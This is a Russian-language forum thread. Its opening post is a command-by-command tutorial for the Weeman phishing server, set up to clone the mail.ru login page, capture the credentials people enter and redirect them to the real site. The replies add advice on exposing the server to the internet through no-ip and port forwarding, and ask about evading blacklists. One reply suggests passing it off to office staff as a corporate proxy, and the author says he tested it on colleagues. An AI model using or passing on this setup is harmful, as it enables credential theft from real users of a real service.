Weeman. Phishing - web-сервер

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 31 окт 2016.

  1. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    Всем привет! Здесь я хочу показать, как легко поднять простой, но довольно эффективный web-server для фишинга.

    Weeman. Phishing - web-сервер

    Он будет захватывать все введенные жертвой учетные данные в формах и собственно, передавать их на терминал сервера.

    Софт, который будет использоваться – это Weeman, http сервер для фишинга, написанный на Python. Итак, для того чтобы воспользоваться им, откроем терминал и введем следующую команду.

    > git clone https://github.com/Hypsurus/weeman

    Затем перейдем в папку, куда был скачан сервер, и выполним следующие команды:

    > cd weeman/

    > ls –a

    > chmod a+x weeman.py

    Weeman. Phishing - web-сервер

    > ./weeman.py

    > help (
    сразу посмотрим доступные опции)

    Weeman. Phishing - web-сервер


    > show (посмотрим текущие настройки)

    Weeman. Phishing - web-сервер

    Используем weeman на примере mail.ru.

    > set url hppts://mail.ru

    > set port 8080

    > set action_url https://mail.ru

    > run

    Weeman. Phishing - web-сервер

    Теперь, при обращении к серверу по адресу, в моем случае это 192.168.0.101:8080, мы попадаем на фишинговый вариант сайта mail.ru, внешне ничем не отличается:

    Weeman. Phishing - web-сервер

    После того как мы введем свои учетные данные сработает редирект на подлинный сайт, а мы получим учетные данные.

    Weeman. Phishing - web-сервер

    На этом пожалуй все, спасибо за внимание.
     
    OBLIVIONNN, ghostphisher, MonMJK и 2 другим нравится это.
  2. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    302
    Добрый вечер,может знаете, как избежать индексации гугл в черный список таких серверов? Живут они не более суток...
     
  3. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    Я его пока, только в локальной сети использую
     
  4. Vladal

    Vladal Active Member
    1C Team

    Репутация:
    0
    Регистрация:
    26 май 2012
    Сообщения:
    26
    Симпатии:
    0
    Все офисные хомячки попрутся, если им сказать, что это корпоративный прокси. Собственно, если этот сервер и сделать прослойкой между хомячками и проксёй.
     
  5. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    Испытано на хомяках - прутся:)
     
  6. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    302
    Не определит пока не будет занесен в базу.так что для локального сегмента это работает...Если же вы используете это во внешней сети, то фишинговые сервера живут не более суток.
     
  7. rez_pk

    rez_pk New Member

    Репутация:
    0
    Регистрация:
    31 окт 2016
    Сообщения:
    3
    Симпатии:
    1
    Ок, в пределах домашней сети все круто, все работает.
    А теперь, что нужно сделать и что нужно для того чтоб на "сайт" заходили из вне?
     
  8. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    302
    no-ip регистрируй, и пробрасывай в роутере порт, и будет тебе счастье...ну и перед использованием рекомендую почитать уголовный кодекс..)
     
    kuklofon и Vander нравится это.
  9. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    УК - отличная книга:)
     
    kuklofon нравится это.
  10. z3RoTooL

    z3RoTooL Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    28 фев 2016
    Сообщения:
    490
    Симпатии:
    309
    э, кулхацкер, бегом в книжный за УК РФ, пока мамка не наругала !
     
  11. rez_pk

    rez_pk New Member

    Репутация:
    0
    Регистрация:
    31 окт 2016
    Сообщения:
    3
    Симпатии:
    1
    ну как обычно... ничего не зная, делать выводы мы все умеем. пусть будет по вашему. как держать оборону если не знать как это работает?
    и кстати спасибо, что беспокоитесь)
     
    #11 rez_pk, 2 ноя 2016
    Последнее редактирование: 2 ноя 2016
    Vander нравится это.
  12. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    На самом деле, я еще не пробовал сделать доступ извне, как время появиться поэксперементирую.
     
  13. Darius

    Darius Member

    Репутация:
    0
    Регистрация:
    28 сен 2016
    Сообщения:
    9
    Симпатии:
    2
    офф-топ конечно, но тема схожая. В se-toolkit c выходом php7 появился баг с предупреждением о разнице во времени сервера и хоста, и таким образом refresh на исходный сайт не производится. Как решать сию проблему, кто-нибудь в курсе ?)
     
  14. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    302
    Странно, я как раз для фишинга тестил setoolkit в связке с no-ip,все замечательно работает.
     
    Vander нравится это.
  15. DoberGroup

    DoberGroup Хмурый мизантроп
    Grey Team

    Репутация:
    0
    Регистрация:
    13 ноя 2016
    Сообщения:
    194
    Симпатии:
    118
    Это лишнее.

    Для тех, у кого на свежем дереве пакетов Python (например, на свежих Kali) вылетает с ошибками в стиле
    Код (Python):
    File "/opt/weeman/lib/bs4/builder/_html5lib.py", line 70, in <module>
        class TreeBuilderForHtml5lib(html5lib.treebuilders._base.TreeBuilder):
    AttributeError: 'module' object has no attribute '_base'
     
    - это проблемы в кривизне beautifulsoup4 (v4.4.1) и html5lib>=0.99999999
    Автор с неизвестной науке целью включил именно эту версию Beautiful Soup-а в пакет.
    Я исправил, пул-реквест сделал, но смерджет ли его автор - не известно, он вроде как переписывает фреймворк на Node.js
     
  16. сергей799

    сергей799 Гость

    Репутация:
    0
    Регистрация:
    1 янв 2017
    Сообщения:
    59
    Симпатии:
    0
    привет я что о не понял тоесть жертва будет заходит на мой маил ру и все ее данные будут приходить мне или я что то не понял?
     
  17. ghostphisher

    ghostphisher гарант codeby
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    7 дек 2016
    Сообщения:
    1.605
    Симпатии:
    1.487
    Что склонируеете на то и будет переход по ссылке Вашей, и если там будет форма ввода данных, она будет заполнена, Вы увидите это.
     
  18. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    302
    Вы не правильно поняли.
     
  19. flesh91

    flesh91 Member

    Репутация:
    0
    Регистрация:
    25 фев 2017
    Сообщения:
    15
    Симпатии:
    7
    Здраствуйте, на github weeman не доступен скиньте пожалуйста сюда у кого есть спасибо
     
    #19 flesh91, 17 мар 2017
    Последнее редактирование: 17 мар 2017
  20. ghostphisher

    ghostphisher гарант codeby
    Команда форума Grey Team

    Репутация:
    2
    Регистрация:
    7 дек 2016
    Сообщения:
    1.605
    Симпатии:
    1.487
    Качаем под хайдом
    пароль codeby.net
     
    Dr.Lafa нравится это.
Загрузка...

Поделиться этой страницей